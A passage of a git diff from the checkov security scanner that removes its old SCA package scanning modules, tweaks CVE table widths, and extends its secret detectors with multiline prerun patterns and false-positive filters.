-                        cve_count.skipped += 1
-                        continue
-                    else:
-                        cve_count.to_fix += 1
-
-                    # best way to dynamically access a class instance attribute.
-                    # (we can't just do cve_count.severity_str to access the correct severity)
-                    severity_str = record.severity.name.lower() if record.severity else BcSeverities.NONE.lower()
-                    setattr(cve_count, severity_str, getattr(cve_count, severity_str) + 1)
-
-                    if record.vulnerability_details["lowest_fixed_version"] != UNFIXABLE_VERSION:
-                        cve_count.has_fix += 1
-
-                    fix_versions_lists.append(record.vulnerability_details["fixed_versions"])
-                    if package_version is None:
-                        package_version = record.vulnerability_details["package_version"]
-
-                    package_cves_details_map[package_name].setdefault("cves", []).append(
-                        {
-                            "id": record.vulnerability_details["id"],
-                            "severity": severity_str,
-                            "fixed_version": record.vulnerability_details["lowest_fixed_version"],
-                        }
-                    )
-                elif record.check_name == SCA_LICENSE_CHECK_NAME:
-                    if record.check_result["result"] == CheckResult.SKIPPED:
-                        continue
-                    should_print_licenses_table = True
-                    package_licenses_details_map[get_package_alias(package_name, record.vulnerability_details["package_version"])].append(
-                        _LicenseStatus(package_name=package_name,
-                                       package_version=record.vulnerability_details["package_version"],
-                                       policy=record.vulnerability_details["policy"],
-                                       license=record.vulnerability_details["license"],
-                                       status=record.vulnerability_details["status"])
-                    )
-
-            if package_name in package_cves_details_map:
-                package_cves_details_map[package_name]["cves"].sort(key=compare_table_items_severity, reverse=True)
-                package_cves_details_map[package_name]["current_version"] = package_version
-                package_cves_details_map[package_name]["compliant_version"] = calculate_lowest_compliant_version(
-                    fix_versions_lists
-                )
-
-        if cve_count.total > 0:
-            cli_outputs.append(
-                create_cli_cves_table(
-                    file_path=file_path,
-                    cve_count=cve_count,
-                    package_details_map=package_cves_details_map,
-                )
-            )
-        if should_print_licenses_table:
-            cli_outputs.append(
-                create_cli_license_violations_table(
-                    file_path=file_path,
-                    package_licenses_details_map=package_licenses_details_map
-                )
-            )
-
-    return "\n".join(cli_outputs)
-
-
-def create_cli_license_violations_table(file_path: str, package_licenses_details_map: Dict[str, List[_LicenseStatus]]) -> str:
-    package_table_lines: List[str] = []
-    columns = 5
-    table_width = 126
-    column_width = int(table_width / columns)
-    package_table = PrettyTable(min_table_width=table_width, max_table_width=table_width)
-    package_table.set_style(SINGLE_BORDER)
-    package_table.field_names = [
-        "Package name",
-        "Package version",
-        "Policy ID",
-        "License",
-        "Status",
-    ]
-    for package_idx, (_, license_statuses) in enumerate(package_licenses_details_map.items()):
-        if package_idx > 0:
-            del package_table_lines[-1]
-            package_table.header = False
-            package_table.clear_rows()
-
-        for idx, license_status in enumerate(license_statuses):
-            col_package_name = ""
-            col_package_version = ""
-            if idx == 0:
-                col_package_name = license_status["package_name"]
-                col_package_version = license_status["package_version"]
-
-            package_table.add_row(
-                [
-                    col_package_name,
-                    col_package_version,
-                    license_status["policy"],
-                    license_status["license"],
-                    license_status["status"],
-                ]
-            )
-
-        package_table.align = "l"
-        package_table.min_width = column_width
-        package_table.max_width = column_width
-
-        for idx, line in enumerate(package_table.get_string().splitlines(keepends=True)):
-            if idx == 0 and package_idx != 0:
-                # hack to make multiple tables look like one
-                line = line.replace(package_table.top_left_junction_char, package_table.left_junction_char).replace(
-                    package_table.top_right_junction_char, package_table.right_junction_char
-                )
-            if package_idx > 0:
-                # hack to make multiple package tables look like one
-                line = line.replace(package_table.top_junction_char, package_table.junction_char)
-
-            # hack for making the table's width as same as the cves-table's
-            package_table_lines.append(f"\t{line[:-2]}{line[-3]}{line[-2:]}")
-
-    return (
-        f"\t{file_path} - Licenses Statuses:\n"
-        f"{''.join(package_table_lines)}\n"
-    )
-
-
-def create_cli_cves_table(file_path: str, cve_count: CveCount, package_details_map: Dict[str, Dict[str, Any]]) -> str:
-    columns = 6
-    table_width = 126
-    column_width = int(126 / columns)
-
-    cve_table_lines = create_cve_summary_table_part(
-        table_width=table_width, column_width=column_width, cve_count=cve_count
-    )
-
-    vulnerable_packages = True if package_details_map else False
-    fixable_table_lines = create_fixable_cve_summary_table_part(
-        table_width=table_width, cve_count=cve_count, vulnerable_packages=vulnerable_packages
-    )
-
-    package_table_lines = create_package_overview_table_part(
-        table_width=table_width, column_width=column_width, package_details_map=package_details_map
-    )
-
-    return (
-        f"\t{file_path} - CVEs Summary:\n"
-        f"{''.join(cve_table_lines)}\n"
-        f"{''.join(fixable_table_lines)}"
-        f"{''.join(package_table_lines)}\n"
-    )
-
-
-def create_cve_summary_table_part(table_width: int, column_width: int, cve_count: CveCount) -> List[str]:
-    cve_table = PrettyTable(
-        header=False,
-        padding_width=1,
-        min_table_width=table_width,
-        max_table_width=table_width,
-    )
-    cve_table.set_style(SINGLE_BORDER)
-    cve_table.add_row(cve_count.output_row())
-    cve_table.align = "l"
-    cve_table.min_width = column_width
-    cve_table.max_width = column_width
-
-    cve_table_lines = [f"\t{line}" for line in cve_table.get_string().splitlines(keepends=True)]
-    # hack to make multiple tables look like one
-    cve_table_bottom_line = (
-        cve_table_lines[-1]
-        .replace(cve_table.bottom_left_junction_char, cve_table.left_junction_char)
-        .replace(cve_table.bottom_right_junction_char, cve_table.right_junction_char)
-    )
-    cve_table_lines[-1] = cve_table_bottom_line
-
-    return cve_table_lines
-
-
-def create_fixable_cve_summary_table_part(
-        table_width: int, cve_count: CveCount, vulnerable_packages: bool
-) -> List[str]:
-    fixable_table = PrettyTable(
-        header=False, min_table_width=table_width + 1, max_table_width=table_width + 1
-    )
-    fixable_table.set_style(SINGLE_BORDER)
-    if cve_count.fixable:
-        fixable_table.add_row(
-            [f"To fix {cve_count.has_fix}/{cve_count.to_fix} CVEs, go to your Prisma Cloud account"])
-        fixable_table.align = "l"
-
-    # hack to make multiple tables look like one
-    fixable_table_lines = [f"\t{line}" for line in fixable_table.get_string().splitlines(keepends=True)]
-    del fixable_table_lines[0]
-    # only remove the last line, if there are vulnerable packages
-    if vulnerable_packages:
-        del fixable_table_lines[-1]
-
-    return fixable_table_lines
-
-
-def create_package_overview_table_part(
-        table_width: int, column_width: int, package_details_map: Dict[str, Dict[str, Any]]
-) -> List[str]:
-    package_table_lines: List[str] = []
-    package_table = PrettyTable(min_table_width=table_width, max_table_width=table_width)
-    package_table.set_style(SINGLE_BORDER)
-    package_table.field_names = [
-        "Package",
-        "CVE ID",
-        "Severity",
-        "Current version",
-        "Fixed version",
-        "Compliant version",
-    ]
-    for package_idx, (package_name, details) in enumerate(package_details_map.items()):
-        if package_idx > 0:
-            del package_table_lines[-1]
-            package_table.header = False
-            package_table.clear_rows()
-
-        for cve_idx, cve in enumerate(details["cves"]):
-            col_package = ""
-            col_current_version = ""
-            col_compliant_version = ""
-            if cve_idx == 0:
-                col_package = package_name
-                col_current_version = details["current_version"]
-                col_compliant_version = details["compliant_version"]
-
-            package_table.add_row(
-                [
-                    col_package,
-                    cve["id"],
-                    cve["severity"],
-                    col_current_version,
-                    cve["fixed_version"],
-                    col_compliant_version,
-                ]
-            )
-
-        package_table.align = "l"
-        package_table.min_width = column_width
-        package_table.max_width = column_width
-
-        for idx, line in enumerate(package_table.get_string().splitlines(keepends=True)):
-            if idx == 0:
-                # hack to make multiple tables look like one
-                line = line.replace(package_table.top_left_junction_char, package_table.left_junction_char).replace(
-                    package_table.top_right_junction_char, package_table.right_junction_char
-                )
-            if package_idx > 0:
-                # hack to make multiple package tables look like one
-                line = line.replace(package_table.top_junction_char, package_table.junction_char)
-
-            package_table_lines.append(f"\t{line}")
-
-    return package_table_lines
diff --git a/checkov/sca_package/runner.py b/checkov/sca_package/runner.py
deleted file mode 100644
index 552d0560cf2..00000000000
--- a/checkov/sca_package/runner.py
+++ /dev/null
@@ -1,172 +0,0 @@
-from __future__ import annotations
-
-import logging
-from pathlib import Path
-from typing import Sequence, Any
-
-from checkov.common.sca.commons import should_run_scan
-from checkov.common.sca.output import add_to_report_sca_data
-from checkov.common.typing import _LicenseStatus
-from checkov.common.bridgecrew.platform_integration import bc_integration
-from checkov.common.models.consts import SUPPORTED_PACKAGE_FILES
-from checkov.common.models.enums import ErrorStatus
-from checkov.common.output.report import Report
-from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.runners.base_runner import BaseRunner, ignored_directories
-from checkov.runner_filter import RunnerFilter
-from checkov.sca_package.scanner import Scanner
-
-
-class Runner(BaseRunner[None, None, None]):
-    check_type = CheckType.SCA_PACKAGE  # noqa: CCE003  # a static attribute
-
-    def __init__(self, report_type: str = check_type) -> None:
-        super().__init__(file_names=SUPPORTED_PACKAGE_FILES)
-        self._check_class: str | None = None
-        self._code_repo_path: Path | None = None
-        self.report_type = report_type
-
-    def prepare_and_scan(
-            self,
-            root_folder: str | Path | None,
-            files: list[str] | None = None,
-            runner_filter: RunnerFilter | None = None,
-            exclude_package_json: bool = True,
-            excluded_file_names: set[str] | None = None,
-    ) -> Sequence[dict[str, Any]] | None:
-        runner_filter = runner_filter or RunnerFilter()
-        excluded_file_names = excluded_file_names or set()
-
-        # skip complete run, if flag '--check' was used without a CVE check ID or the license policies
-        if not should_run_scan(runner_filter.checks):
-            return []
-
-        if not bc_integration.bc_api_key:
-            logging.info("The --bc-api-key flag needs to be set to run SCA package scanning")
-            return []
-
-        logging.info("SCA package scanning searching for scannable files")
-
-        self._code_repo_path = Path(root_folder) if root_folder else None
-
-        excluded_paths = {*ignored_directories}
-        if runner_filter.excluded_paths:
-            excluded_paths.update(runner_filter.excluded_paths)
-
-        input_paths = self.find_scannable_files(
-            root_path=self._code_repo_path,
-            files=files,
-            excluded_paths=excluded_paths,
-            exclude_package_json=exclude_package_json,
-            excluded_file_names=excluded_file_names
-        )
-        if not input_paths:
-            # no packages found
-            return []
-
-        logging.info(f"SCA package scanning will scan {len(input_paths)} files")
-
-        scanner = Scanner(self.pbar, root_folder)
-        self._check_class = f"{scanner.__module__}.{scanner.__class__.__qualname__}"
-
-        # it will be None in case of unexpected failure during the scanning
-        scan_results: Sequence[dict[str, Any]] | None = scanner.scan(input_paths)
-        if scan_results is not None:
-            logging.info(f"SCA package scanning successfully scanned {len(scan_results)} files")
-        return scan_results
-
-    def run(
-            self,
-            root_folder: str | Path | None,
-            external_checks_dir: list[str] | None = None,
-            files: list[str] | None = None,
-            runner_filter: RunnerFilter | None = None,
-            collect_skip_comments: bool = True,
-    ) -> Report | list[Report]:
-        runner_filter = runner_filter or RunnerFilter()
-        if not runner_filter.show_progress_bar:
-            self.pbar.turn_off_progress_bar()
-
-        report = Report(self.check_type)
-
-        scan_results = self.prepare_and_scan(root_folder, files, runner_filter)
-        if scan_results is None:
-            report.set_error_status(ErrorStatus.ERROR)
-            return report
-
-        for result in scan_results:
-            if not result:
-                continue
-            package_file_path = Path(result["repository"])
-            if self._code_repo_path:
-                try:
-                    package_file_path = package_file_path.relative_to(self._code_repo_path)
-                except ValueError:
-                    # Path.is_relative_to() was implemented in Python 3.9
-                    pass
-
-            vulnerabilities = result.get("vulnerabilities") or []
-            packages = result.get("packages") or []
-
-            license_statuses = [_LicenseStatus(package_name=elm["packageName"], package_version=elm["packageVersion"],
-                                               policy=elm["policy"], license=elm["license"], status=elm["status"])
-                                for elm in result.get("license_statuses") or []]
-
-            rootless_file_path = str(package_file_path).replace(package_file_path.anchor, "", 1)
-            add_to_report_sca_data(
-                report=report,
-                check_class=self._check_class,
-                scanned_file_path=str(package_file_path),
-                rootless_file_path=rootless_file_path,
-                runner_filter=runner_filter,
-                vulnerabilities=vulnerabilities,
-                packages=packages,
-                license_statuses=license_statuses,
-                report_type=self.report_type,
-                dependencies=result.get("dependencies", None)
-            )
-
-        return report
-
-    def find_scannable_files(
-        self,
-        root_path: Path | None,
-        files: list[str] | None,
-        excluded_paths: set[str],
-        exclude_package_json: bool = True,
-        excluded_file_names: set[str] | None = None,
-        extra_supported_package_files: set[str] | None = None
-    ) -> set[Path]:
-        excluded_file_names = excluded_file_names or set()
-        extra_supported_package_files = extra_supported_package_files or set()
-        input_paths: set[Path] = set()
-        if root_path:
-            input_paths = {
-                file_path
-                for file_path in root_path.glob("**/*")
-                if file_path.name in SUPPORTED_PACKAGE_FILES.union(extra_supported_package_files) and not any(p in file_path.parts for p in excluded_paths)
-            }
-
-            package_json_lock_parent_paths = set()
-            if exclude_package_json:
-                # filter out package.json, if package-lock.json or yarn.lock exists
-                package_json_lock_parent_paths = {
-                    file_path.parent for file_path in input_paths if
-                    file_path.name in {"package-lock.json", "yarn.lock"}
-                }
-
-            input_paths = {
-                file_path
-                for file_path in input_paths
-                if (file_path.name != "package.json" or file_path.parent not in package_json_lock_parent_paths) and file_path.name not in excluded_file_names
-            }
-
-        for file in files or []:
-            file_path = Path(file)
-            if not file_path.exists():
-                logging.warning(f"File {file_path} doesn't exist")
-                continue
-
-            input_paths.add(file_path)
-
-        return input_paths
diff --git a/checkov/sca_package/scanner.py b/checkov/sca_package/scanner.py
deleted file mode 100644
index e662c4a99a6..00000000000
--- a/checkov/sca_package/scanner.py
+++ /dev/null
@@ -1,193 +0,0 @@
-from __future__ import annotations
-
-import asyncio
-import json
-import logging
-import os
-import time
-from collections.abc import Iterable, Sequence, Collection
-from pathlib import Path
-from typing import Dict, Any, List
-
-import requests
-
-from checkov.common.bridgecrew.platform_integration import bc_integration
-from checkov.common.bridgecrew.platform_key import bridgecrew_dir
-from checkov.common.bridgecrew.vulnerability_scanning.image_scanner import image_scanner, TWISTCLI_FILE_NAME
-from checkov.common.bridgecrew.vulnerability_scanning.integrations.docker_image_scanning import \
-    docker_image_scanning_integration
-from checkov.common.util.file_utils import compress_file_gzip_base64, decompress_file_gzip_base64
-from checkov.common.util.http_utils import request_wrapper
-
-from checkov.common.util.tqdm_utils import ProgressBar
-
-SLEEP_DURATION = 2
-MAX_SLEEP_DURATION = 60
-
-
-class Scanner:
-    def __init__(self, pbar: ProgressBar | None = None, root_folder: str | Path | None = None) -> None:
-        self._base_url = bc_integration.api_url
-        if pbar:
-            self.pbar = pbar
-        else:
-            self.pbar = ProgressBar('')
-            self.pbar.turn_off_progress_bar()
-        self.root_folder = root_folder
-
-    @staticmethod
-    def should_rescan_for_result(scan_result: dict[str, Any] | None) -> bool:
-        return scan_result is None or scan_result.get("packages") is None
-
-    def scan(self, input_paths: Collection[Path]) -> Sequence[dict[str, Any]] | None:
-        self.pbar.initiate(len(input_paths))
-        scan_results = asyncio.run(
-            self.run_scan_multi(input_paths=input_paths)
-        )
-        self.pbar.close()
-        return scan_results
-
-    async def run_scan_multi(
-            self,
-            input_paths: "Iterable[Path]",
-    ) -> "Sequence[Dict[str, Any]] | None":
-
-        if os.getenv("PYCHARM_HOSTED") == "1":
-            # PYCHARM_HOSTED env variable equals 1 when running via Pycharm.
-            # it avoids us from crashing, which happens when using multiprocessing via Pycharm's debug-mode
-            logging.warning("Running the scans in sequence for avoiding crashing when running via Pycharm")
-            scan_results: list[dict[str, Any] | None] = []
-            for input_path in input_paths:
-                scan_results.append(await self.run_scan(input_path))
-        else:
-            scan_results = await asyncio.gather(*[self.run_scan(i) for i in input_paths])
-
-        if any(self.should_rescan_for_result(scan_result) for scan_result in scan_results):
-            status: bool = image_scanner.setup_twistcli()
-
-            if not status:
-                return None
-            if os.getenv("PYCHARM_HOSTED") == "1":
-                # PYCHARM_HOSTED env variable equals 1 when running via Pycharm.
-                # it avoids us from crashing, which happens when using multiprocessing via Pycharm's debug-mode
-                logging.warning("Running the scans in sequence for avoiding crashing when running via Pycharm")
-                scan_results = [
-                    await self.execute_twistcli_scan(input_path) if self.should_rescan_for_result(scan_results[idx])
-                    else scan_results[idx] for idx, input_path in enumerate(input_paths)
-                ]
-            else:
-                input_paths_as_list: List[Path] = list(input_paths)  # create a list from a set ("Iterable")
-                indices_to_fix: List[int] = [
-                    idx
-                    for idx in range(len(input_paths_as_list))
-                    if self.should_rescan_for_result(scan_results[idx])
-                ]
-                new_scan_results = await asyncio.gather(*[
-                    self.execute_twistcli_scan(input_paths_as_list[idx]) for idx in indices_to_fix
-                ])
-                for idx in indices_to_fix:
-                    res = new_scan_results.pop(0)
-                    res['repository'] = str(input_paths_as_list[idx])
-                    scan_results[idx] = res
-
-        # checking whether there are None results that indicates for error. id there is any, we return None
-        scan_results_without_nones: list[dict[str, Any]] = []
-        for result in scan_results:
-            if result is None:
-                return None
-            else:
-                scan_results_without_nones.append(result)
-
-        return scan_results_without_nones
-
-    async def run_scan(self, input_path: Path) -> dict[str, Any] | None:
-        try:
-            self.pbar.set_additional_data({'Current File Scanned': os.path.relpath(input_path, self.root_folder)})
-            logging.info(f"Start to scan package file {input_path}")
-
-            request_body = {
-                "compressedFileBody": compress_file_gzip_base64(str(input_path)),
-                "compressionMethod": "gzip",
-                "fileName": input_path.name
-            }
-
-            response = request_wrapper(
-                "POST", f"{self._base_url}/api/v1/vulnerabilities/scan",
-                headers=bc_integration.get_default_headers("POST"),
-                json=request_body,
-                should_call_raise_for_status=True
-            )
-
-            response_json = response.json()
-
-            if response_json["status"] == "already_exist":
-                logging.info(f"result for {input_path} exists in the cache")
-                return self.parse_api_result(input_path, response_json["outputData"])
-
-            return self.run_scan_busy_wait(input_path, response_json['id'])
-        except Exception:
-            logging.debug(
-                "[sca_package] - Unexpected failure happened during package scanning.\n"
-                "the scanning is terminating. details are below.\n"
-                "please try again. if it is repeated, please report.", exc_info=True)
-            return None
-
-    def run_scan_busy_wait(self, input_path: Path, scan_id: str) -> dict[str, Any]:
-        current_state = "Empty"
-        desired_state = "Result"
-        total_sleeping_time = 0
-        response = requests.Response()
-
-        while current_state != desired_state:
-            response = request_wrapper(
-                "GET", f"{self._base_url}/api/v1/vulnerabilities/scan-results/{scan_id}",
-                headers=bc_integration.get_default_headers("GET")
-            )
-            response_json = response.json()
-            current_state = response_json["outputType"]
-
-            if current_state == "Error":
-                logging.error(response_json["outputData"])
-                return {}
-
-            if total_sleeping_time > MAX_SLEEP_DURATION:
-                logging.info(f"Timeout, slept for {total_sleeping_time}")
-                return {}
-
-            time.sleep(SLEEP_DURATION)
-            total_sleeping_time += SLEEP_DURATION
-
-        return self.parse_api_result(input_path, response.json()["outputData"])
-
-    def parse_api_result(self, origin_file_path: Path, response: str) -> dict[str, Any]:
-        raw_result: dict[str, Any] = json.loads(decompress_file_gzip_base64(response))
-        raw_result['repository'] = str(origin_file_path)
-        self.pbar.update()
-        return raw_result
-
-    async def execute_twistcli_scan(
-            self,
-            input_path: Path,
-    ) -> Dict[str, Any]:
-        output_path = Path(f'results-{input_path.name}.json')
-
-        command = f"{Path(bridgecrew_dir) / TWISTCLI_FILE_NAME} coderepo scan --address {docker_image_scanning_integration.get_proxy_address()} --token {docker_image_scanning_integration.get_bc_api_key()} --details --output-file \"{output_path}\" {input_path}"
-        process = await asyncio.create_subprocess_shell(
-            command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
-        )
-
-        stdout, stderr = await process.communicate()
-
-        # log output for debugging
-        logging.debug(stdout.decode())
-
-        exit_code = await process.wait()
-
-        if exit_code:
-            logging.error(stderr.decode())
-            return {}
-
-        # read the report file
-        scan_result: Dict[str, Any] = json.loads(output_path.read_text())
-        output_path.unlink()
-        return scan_result
diff --git a/checkov/sca_package_2/output.py b/checkov/sca_package_2/output.py
index 4cfe23a09db..ba05eccc482 100644
--- a/checkov/sca_package_2/output.py
+++ b/checkov/sca_package_2/output.py
@@ -2,6 +2,7 @@
 
 import itertools
 import logging
+import sys
 from collections import defaultdict
 from dataclasses import dataclass
 from typing import List, Union, Dict, Any
@@ -229,7 +230,6 @@ def create_cli_license_violations_table(file_path: str,
         "Package version",
         "Policy ID",
         "License",
-        "Status",
     ]
     for package_idx, (_, license_statuses) in enumerate(package_licenses_details_map.items()):
         if package_idx > 0:
@@ -248,8 +248,7 @@ def create_cli_license_violations_table(file_path: str,
                 col_package_name,
                 col_package_version,
                 license_status["policy"],
-                license_status["license"],
-                license_status["status"],
+                license_status["license"]
             ]
             package_table.add_row(curr_row)
 
@@ -280,15 +279,20 @@ def create_cli_cves_table(file_path: str, cve_count: CveCount, package_details_m
                           lines_details_found: bool) -> str:
     columns = 7
     table_width = 159
+    fixed_line_with = 159
     column_width = int(table_width / columns)
 
+    # on python 3.12 and above, the columns are smaller, need to make them wider in order to have consistency.
+    if sys.version_info >= (3, 12):
+        table_width = 165
+
     cve_table_lines = create_cve_summary_table_part(
         table_width=table_width, column_width=column_width, cve_count=cve_count
     )
 
     vulnerable_packages = True if package_details_map else False
     fixable_table_lines = create_fixable_cve_summary_table_part(
-        table_width=table_width, column_count=columns, cve_count=cve_count, vulnerable_packages=vulnerable_packages
+        table_width=fixed_line_with, column_count=columns, cve_count=cve_count, vulnerable_packages=vulnerable_packages
     )
 
     package_table_lines = create_package_overview_table_part(
diff --git a/checkov/secrets/local_secrets_runner.py b/checkov/secrets/local_secrets_runner.py
new file mode 100644
index 00000000000..a0d493b58e1
--- /dev/null
+++ b/checkov/secrets/local_secrets_runner.py
@@ -0,0 +1,43 @@
+# flake8: noqa
+# type: ignore
+
+import json
+import os
+
+from checkov.main import secrets_runner
+from checkov.common.runners.runner_registry import RunnerRegistry
+from checkov.runner_filter import RunnerFilter
+from checkov.common.bridgecrew.platform_integration import bc_integration
+
+
+with open(os.environ['LOCAL_SECRETS_POLICIES_JSON']) as secrets_policies_file:
+    default_regexes = json.load(secrets_policies_file)
+bc_integration.customer_run_config_response = {'secretsPolicies': default_regexes}
+
+
+def execute():
+    runner = secrets_runner(entropy_limit=4)
+    # 20 min less in order to finish processing, else put checkov's default (12h - 1200)
+    runner_registry = RunnerRegistry(
+        '',
+        RunnerFilter(
+            block_list_secret_scan=[],
+            enable_secret_scan_all_files=True,
+            enable_git_history_secret_scan=False,
+            git_history_last_commit_scanned=None,
+            git_history_timeout="checkov_timeout_str",
+            checks=['BC_GIT_79']
+        ),
+        runner
+    )
+
+    scan_reports = runner_registry.run(
+        root_folder=os.environ["LOCAL_SCANNING_FOLDER"],
+        external_checks_dir=list(),
+        collect_skip_comments=True)
+
+    print(scan_reports)
+
+
+if __name__ == "__main__":
+    execute()
diff --git a/checkov/secrets/plugins/custom_regex_detector.py b/checkov/secrets/plugins/custom_regex_detector.py
index b444dc977ce..eedd829b7dc 100644
--- a/checkov/secrets/plugins/custom_regex_detector.py
+++ b/checkov/secrets/plugins/custom_regex_detector.py
@@ -2,6 +2,7 @@
 
 import logging
 from typing import Set, Any, Generator, Pattern, Optional, Dict, Tuple, TYPE_CHECKING, cast
+from collections import defaultdict
 
 from detect_secrets.constants import VerifiedResult
 from detect_secrets.core.potential_secret import PotentialSecret
@@ -29,16 +30,24 @@ def __init__(self) -> None:
         self.regex_to_metadata: dict[str, dict[str, Any]] = dict()
         self.denylist = set()
         self.multiline_deny_list = set()
+        self.multiline_pattern_by_prerun_compiled: dict[str, Pattern[str]] = dict()
         self.multiline_regex_to_metadata: dict[str, dict[str, Any]] = dict()
         self._analyzed_files: Set[str] = set()
+        self._analyzed_files_by_check: Dict[str, Set[str]] = defaultdict(lambda: set())
         self._multiline_regex_supported_file_types: Set[str] = set()
         detectors = load_detectors()
 
         for detector in detectors:
             try:
                 if detector.get("isMultiline"):
-                    self.multiline_deny_list.add(re.compile('{}'.format(detector["Regex"])))
-                    self.multiline_regex_to_metadata[detector["Regex"]] = detector
+                    # If prerun exists, we will add it as 'regular detector' (special treat in analyze_line)
+                    if detector.get("prerun"):
+                        self.denylist.add(re.compile('{}'.format(detector["prerun"])))
+                        self.regex_to_metadata[detector["prerun"]] = detector
+                        self.multiline_pattern_by_prerun_compiled[detector["prerun"]] = re.compile('{}'.format(detector["Regex"]))
+                    else:
+                        self.multiline_deny_list.add(re.compile('{}'.format(detector["Regex"])))
+                        self.multiline_regex_to_metadata[detector["Regex"]] = detector
                     continue
                 self.denylist.add(re.compile('{}'.format(detector["Regex"])))
                 self.regex_to_metadata[detector["Regex"]] = detector
@@ -86,11 +95,14 @@ def analyze_line(
         if filename not in self._analyzed_files:
             self._analyzed_files.add(filename)
             # We only want to read file if: there is regex supporting it & file size is not over MAX_FILE_SIZE
+            # Notice: in the find potential secret we check per multiline regex if we should run it according the filetype.
+            #   This is only a validation to reduce file content reading in case it not supported at all
             if not self.multiline_regex_to_metadata.values() or \
                     not self.multiline_regex_supported_file_types or \
                     not any([filename.endswith(str(file_type)) for file_type in self.multiline_regex_supported_file_types]) or \
                     not 0 < get_file_size_safe(filename) < CustomRegexDetector.MAX_FILE_SIZE:
                 return output
+
             file_content = read_file_safe(filename)
             if not file_content:
                 return output
@@ -138,6 +150,40 @@ def _find_potential_secret(
             except Exception:
                 is_verified = False
             regex_data = current_regex_to_metadata[regex.pattern]
+
+            # It's a multiline regex (only the prerun executed). We should execute the whole multiline pattern
+            # We want to run multiline policy once per file (if prerun was found)
+            if regex_data.get("prerun"):
+                if filename in self._analyzed_files_by_check[regex_data['Check_ID']]:
+                    continue
+                self._analyzed_files_by_check[regex_data['Check_ID']].add(filename)
+
+                # We are going to scan the whole file with the multiline regex
+                if not 0 < get_file_size_safe(filename) < CustomRegexDetector.MAX_FILE_SIZE:
+                    continue
+                file_content = read_file_safe(filename)
+                if not file_content:
+                    continue
+                multiline_regex = self.multiline_pattern_by_prerun_compiled.get(regex.pattern)
+                if multiline_regex is None:
+                    continue
+                multiline_matches = multiline_regex.findall(file_content)
+                for mm in multiline_matches:
+                    mm = f"'{mm}'"
+                    ps = PotentialSecret(
+                        type=regex_data["Name"],
+                        filename=filename,
+                        secret=mm,
+                        line_number=line_number,
+                        is_verified=is_verified,
+                        is_added=is_added,
+                        is_removed=is_removed,
+                        is_multiline=True,
+                    )
+                    ps.check_id = regex_data["Check_ID"]
+                    output.add(ps)
+                continue
+
             # Wrap multiline match with fstring + ''
             match = f"'{match}'" if is_multiline else match
             ps = PotentialSecret(
diff --git a/checkov/secrets/plugins/detector_utils.py b/checkov/secrets/plugins/detector_utils.py
index 0c632869444..3bed63d0778 100644
--- a/checkov/secrets/plugins/detector_utils.py
+++ b/checkov/secrets/plugins/detector_utils.py
@@ -26,6 +26,8 @@
 
 MAX_KEYWORD_LIMIT = 500
 
+B64_FP_REGEX = re.compile(r'\b[A-Za-z]+_+[A-Za-z_]*[A-Za-z]\b')
+
 DENY_LIST_REGEX = r'|'.join(DENYLIST)
 # Support for suffix after keyword i.e. password_secure = "value"
 DENY_LIST_REGEX2 = r'({denylist}){suffix}'.format(
@@ -186,20 +188,33 @@ def remove_fp_secrets_in_keys(detected_secrets: set[PotentialSecret], line: str,
     for detected_secret in detected_secrets:
         if not detected_secret.secret_value:
             continue
+        processed_line = get_processed_line(formatted_line, detected_secret.secret_value)
         # Found keyword prefix as potential secret
-        if formatted_line.startswith(detected_secret.secret_value):
+        if processed_line.startswith(detected_secret.secret_value):
             secrets_to_remove.add(detected_secret)
         # found a function name at the end of the line
-        if formatted_line and FUNCTION_CALL_AFTER_KEYWORD_REGEX.search(formatted_line):
+        if processed_line and FUNCTION_CALL_AFTER_KEYWORD_REGEX.search(processed_line):
             secrets_to_remove.add(detected_secret)
         # secret value is substring of keywork
-        if is_code_file and FOLLOWED_BY_EQUAL_VALUE_KEYWORD_REGEX.search(formatted_line):
+        if is_code_file and FOLLOWED_BY_EQUAL_VALUE_KEYWORD_REGEX.search(processed_line):
             key, value = line.split("=", 1)
             if detected_secret.secret_value in key and detected_secret.secret_value in value:
                 secrets_to_remove.add(detected_secret)
+        # strings which are all lower/upper case letters are suspected to not be base64 high entropy strings
+        # the 2nd part of the end is to make test_non_multiline_pair_time_limit_creating_report pass
+        if B64_FP_REGEX.search(detected_secret.secret_value) and "SECRET" not in detected_secret.secret_value:
+            secrets_to_remove.add(detected_secret)
     detected_secrets -= secrets_to_remove
 
 
+def get_processed_line(formatted_line: str, secret_value: str) -> str:
+    if not formatted_line.startswith(secret_value) and formatted_line.find(":",
+                                                                           formatted_line.rfind(secret_value) + len(
+                                                                               secret_value)) > -1:
+        return formatted_line[formatted_line.find(secret_value):]
+    return formatted_line
+
+
 def format_reducing_noise_secret(string: str) -> str:
     return json.dumps(string)
 
diff --git a/checkov/secrets/plugins/entropy_keyword_combinator.py b/checkov/secrets/plugins/entropy_keyword_combinator.py
index b542897b52d..02aeb568095 100644
--- a/checkov/secrets/plugins/entropy_keyword_combinator.py
+++ b/checkov/secrets/plugins/entropy_keyword_combinator.py
@@ -1,6 +1,7 @@
 from __future__ import annotations
 
 import re
+import os
 from typing import Generator, Set, Tuple
 from typing import Any
 from typing import TYPE_CHECKING
@@ -29,7 +30,7 @@
 
 MAX_LINE_LENGTH = 10000
 MAX_KEYWORD_LIMIT = 500
-ENTROPY_KEYWORD_COMBINATOR_LIMIT = 3
+ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))
 ENTROPY_KEYWORD_LIMIT = 4.8
 
 DENY_LIST_REGEX = r'|'.join(DENYLIST)
@@ -118,10 +119,18 @@
 class EntropyKeywordCombinator(BasePlugin):
     secret_type = ""  # nosec  # noqa: CCE003  # a static attribute
 
-    def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH) -> None:
-        iac_limit = ENTROPY_KEYWORD_COMBINATOR_LIMIT
-        self.high_entropy_scanners_iac = (Base64HighEntropyString(limit=iac_limit), HexHighEntropyString(limit=iac_limit))
-        self.entropy_scanners_non_iac_with_keyword = (Base64HighEntropyString(limit=iac_limit + 0.3), HexHighEntropyString(limit=iac_limit + 0.3))
+    def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH,
+                 entropy_limit: float = ENTROPY_KEYWORD_COMBINATOR_LIMIT) -> None:
+        self.entropy_limit = entropy_limit
+        self.high_entropy_scanners_iac = (
+            Base64HighEntropyString(
